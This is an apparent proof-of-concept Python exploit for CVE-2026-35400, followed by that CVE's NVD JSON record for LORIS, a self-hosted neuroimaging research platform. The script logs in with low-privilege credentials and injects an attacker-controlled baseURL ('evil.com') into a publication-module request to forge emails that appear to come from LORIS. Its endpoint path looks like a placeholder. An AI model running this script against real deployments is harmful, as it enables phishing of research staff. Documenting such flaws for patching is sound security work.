CVE-2026-35400

import requests # Target configuration target_host = "https://example-loris.com" attacker_domain = "https://evil.com" login_url = f"{target_host}/login" vuln_url = f"{target_host}/publication_module/api/endpoint" # User credentials (Low privilege user required) username = "researcher" password = "password" # Establish session session = requests.Session() # 1. Login to get session cookie login_data = {"username": username, "password": password} session.post(login_url, data=login_data) # 2. Send malicious POST request to trigger email forgery # Exploit: Malicious baseURL in POST data payload = { "baseURL": attacker_domain, # The vulnerable parameter "title": "Fake Research Update", "description": "Please check this link." } response = session.post(vuln_url, data=payload) if response.status_code == 200: print("[+] Exploit successful! Email sent with attacker-controlled baseURL.") else: print(f"[-] Exploit failed. Status: {response.status_code}")

{"cve": {"id": "CVE-2026-35400", "sourceIdentifier": "[email protected]", "published": "2026-04-08T19:25:23.590", "lastModified": "2026-04-21T20:13:38.600", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "LORIS (Longitudinal Online Research and Imaging System) is a self-hosted web application that provides data- and project-management for neuroimaging research. From 20.0.0 to before 27.0.3 and 28.0.1, an endpoint in the publication module was incorrectly trusting the baseURL submitted by a user's POST request rather than the internal LORIS value. This could result in a theoretical attacker with publication module access forging an email to an external domain under the attacker's control which appeared to come from LORIS. This vulnerability is fixed in 27.0.3 and 28.0.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-59"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mcgill:loris:*:*:*:*:*:*:*:*", "versionStartIncluding": "20.0.0", "versionEndIncluding": "27.0.2", "matchCriteriaId": "91166D84-04DC-4603-8E1B-ADE86AB22608"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mcgill:loris:28.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "D358B66A-04AC-44F2-8EF6-4332D8AC00F4"}]}]}], "references": [{"url": "https://github.com/aces/Loris/security/advisories/GHSA-6prw-34x8-3gpg", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}